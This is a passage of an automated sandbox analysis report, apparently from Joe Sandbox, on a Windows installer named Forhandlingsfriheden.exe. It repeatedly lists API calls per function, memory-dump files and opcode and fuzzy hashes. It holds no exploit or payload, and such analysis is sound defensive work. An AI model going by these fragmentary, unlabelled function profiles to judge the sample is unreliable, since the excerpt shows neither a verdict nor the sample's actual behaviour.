                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\Forhandlingsfriheden.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-3250047392
                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                            • GetSysColor.USER32(00000000), ref: 00404582
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                            • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                            • GetSysColor.USER32(?), ref: 004045AD
                                                                            • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                            • DeleteObject.GDI32(?), ref: 004045D7
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                              • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                            • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                            • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                            • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                            • GetMessagePos.USER32 ref: 00404E9E
                                                                            • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E76
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Calibri
                                                                            • API String ID: 3808545654-1409258342
                                                                            • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                            • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                            • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                            • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                            • MulDiv.KERNEL32(000C38E5,00000064,000C3AE9), ref: 00403001
                                                                            • wsprintfW.USER32 ref: 00403011
                                                                            • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040300B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                            • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                            • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                            • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                            • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                            • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                            • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                            • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                            • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                            • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                            • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                            • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                            • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                            • wsprintfW.USER32 ref: 00404E17
                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
